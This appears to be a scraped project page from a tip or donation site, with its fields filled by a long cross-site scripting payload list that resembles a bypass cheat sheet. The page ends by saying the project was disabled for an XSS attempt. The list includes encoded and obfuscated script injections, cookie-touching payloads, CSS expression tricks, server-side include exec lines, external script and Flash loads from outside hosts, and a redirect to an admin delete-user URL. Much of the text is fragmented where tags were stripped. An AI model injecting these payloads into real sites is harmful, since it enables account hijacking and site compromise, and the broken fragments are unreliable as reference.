</script><script/%00%00v%00%00>alert('http://lubi.cz')</script>\\

'"()&%1<ScRiPt >prompt(document.domain)</ScRiPt>

document.cookie=true"> document.cookie=true; document.cookie=true;//< document.cookie=true; a=/CrossSiteScripting/\ndocument.cookie=true; document.cookie=true; li {list-style-image: url("javascript:document.cookie=true;");CrossSiteScripting ¼script¾document.cookie=true;¼/script¾ @im\port'\ja\vasc\ript:document.cookie=true'; exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting///*/pression(document.cookie=true)'> document.cookie=true; .CrossSiteScripting{background-image:url("javascript:document.cookie=true");} BODY{background:url("javascript:document.cookie=true")} document.cookie=true; <![CDATA[]] cript:document.cookie=true"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2">document.cookie=true"> <? echo('document.cookie=true'); ?> +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- &document.cookie=true; &{document.cookie=true;}; document.cookie=true;"> document.cookie=true; <!--document.cookie=true;//--> <document.cookie=true; document.cookie=true;//--> <!-- -- -->document.cookie=true;<!-- -- --> " onmouseover="document.cookie=true;"> document.cookie=true;; ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with close TAG:

" "document.cookie=true"> "document.cookie=true; " " " " "document.cookie=true;//< "document.cookie=true; " " "a=/CrossSiteScripting/\ndocument.cookie=true; "document.cookie=true; " " " " " " " " " "li {list-style-image: url("javascript:document.cookie=true;");CrossSiteScripting "¼script¾document.cookie=true;¼/script¾ " " " " " " " "@im\port'\ja\vasc\ript:document.cookie=true'; " " "exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting///*/pression(document.cookie=true)'> "document.cookie=true; ".CrossSiteScripting{background-image:url("javascript:document.cookie=true");} "BODY{background:url("javascript:document.cookie=true")} "document.cookie=true; " " "<![CDATA[]] "cript:document.cookie=true"> "<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2">document.cookie=true"> "<? echo('document.cookie=true'); ?> " +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- " " " " " " "&document.cookie=true; "&{document.cookie=true;}; " " " " "document.cookie=true;"> " " " " " "document.cookie=true; " "<!--document.cookie=true;//--> "<document.cookie=true; "document.cookie=true;//--> "<!-- -- -->document.cookie=true;<!-- -- --> " "" onmouseover="document.cookie=true;"> " "document.cookie=true;; " ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings with negative value & TAG: -1 -1document.cookie=true"> -1document.cookie=true; -1 -1 -1 -1 -1document.cookie=true;//< -1document.cookie=true; -1 -1 -1a=/CrossSiteScripting/\ndocument.cookie=true; -1document.cookie=true; -1 -1 -1 -1 -1 -1 -1 -1 -1 -1li {list-style-image: url("javascript:document.cookie=true;");CrossSiteScripting -1¼script¾document.cookie=true;¼/script¾ -1 -1 -1 -1 -1 -1 -1 -1@im\port'\ja\vasc\ript:document.cookie=true'; -1 -1 -1exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//");CrossSiteScripting:ex/CrossSiteScripting///*/pression(document.cookie=true)'> -1document.cookie=true; -1.CrossSiteScripting{background-image:url("javascript:document.cookie=true");} -1BODY{background:url("javascript:document.cookie=true")} -1document.cookie=true; -1 -1 -1<![CDATA[]] -1cript:document.cookie=true"> -1<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2">document.cookie=true"> -1<? echo('document.cookie=true'); ?> -1 +ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4- -1 -1 -1 -1 -1 -1 -1&document.cookie=true; -1&{document.cookie=true;}; -1 -1 -1 -1 -1document.cookie=true;"> -1 -1 -1 -1 -1 -1document.cookie=true; -1 -1<!--document.cookie=true;//--> -1<document.cookie=true; -1document.cookie=true;//--> -1<!-- -- -->document.cookie=true;<!-- -- --> -1 -1" onmouseover="document.cookie=true;"> -1 -1document.cookie=true;; -1 ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>

Cross Site Scripting Strings Restriction Bypass Mail:

"@gmail.com "alert(document.cookie)alert(document.cookie)@gmail.com

@gmail.com alert(document.cookie)alert(document.cookie)@gmail.com

Cross Site Scripting Strings Restriction Bypass Phone: +49/>"1337 "> 1337+1

Cross Site Scripting Strings Restriction Bypass Obfuscation

“ALeRt("VlAb") "

Cross Site Scripting Strings Restriction Bypass String to Charcode

String:fr om.Char.Code

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//-->">'>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103)) '';!--"=&{()}

Cross Site Scripting Strings Restriction Bypass encoded frame url

%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F %73%63%72%69%70%74%3E

Cross Site Scripting Strings via Console: set vlan name 1337 alert(document.cookie) set system name set system location ">alert('VL')

insert alert(document.cookie) add <!--#exec cmd="/bin/echo '<!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js>'"--> add user alert(document.cookie) alert(document.cookie)@gmail.com

add topic add name alert('VL')

perl -e 'print "";' > out perl -e 'print "alert(\"CrossSiteScripting\")";' > out

<!--[if gte IE 4]> alert('CrossSiteScripting'); <![endif]-->

Cross Site Scripting Strings on per line validation applications:

<IMG

SRC

" j a v a s c r i p t : a l e r t ( ' V L A B ' ) "

Cross Site Scripting Strings Embed:

Cross Site Scripting Strings Action Script:

   <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300">
       <param name="movie" value="http://www.subhohalder.com/xysecteam.swf" />
             <param name="quality" value="high" />
             <param name="scale" value="noscale" />
             <param name="salign" value="LT" />
   <param name="allowScriptAccess" value="always" />
             <param name="menu" value="false" />
        </object>

<alert("CrossSiteScripting");//< a=/CrossSiteScripting/ alert(a.source) " SRC="http://vulnerability-lab.com/CrossSiteScripting.js"> ` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"> document.write("PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"> alert("CrossSiteScripting");

alert("CrossSiteScripting")"> A

; REL=stylesheet"> alert('CrossSiteScripting')"> +ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-

@im\port'\ja\vasc\ript:alert("CrossSiteScripting")'; @import'http://vulnerability-lab.com/CrossSiteScripting.css'; alert('CrossSiteScripting'); .CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");} BODY{background:url("javascript:alert('CrossSiteScripting')")} li {list-style-image: url("javascript:alert('CrossSiteScripting')");}CrossSiteScripting BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}

<iframe src=http://vulnerability-lab.com/index.html <

CrossSiteScripting CrossSiteScripting CrossSiteScripting CrossSiteScripting

\";alert('CrossSiteScripting');//

¼script¾alert(¢CrossSiteScripting¢)¼/script¾

exp/<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("//"); CrossSiteScripting:ex/CrossSiteScripting///*/pression(alert("CrossSiteScripting"))'>

a="get"; b="URL(\""; c="javascript:"; d="alert('CrossSiteScripting');\")"; eval(v+l+a+b);

<?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc"> <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting/CrossSiteScripting:CrossSiteScripting

<![CDATA[<![CDATA[cript:alert('CrossSiteScripting');">]]>

cript:alert('CrossSiteScripting')">

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> alert("CrossSiteScripting")">

<!--#exec cmd="/bin/echo '<!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js>'"-->

<? echo('alert("CrossSiteScripting")'); ?>

Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E

<iframe src=http://test.de>

&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62

PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+

">>>'"<Click Me!TEST click

Project Disabled

This project has been disabled. It doesn't accept donation and it will not distribute tips.

Reason: XSS attempt


Promote </script><script/%00%00v%00%00>alert('http://lubi.cz')</script>\\

Embed in README.md

Peer4Commit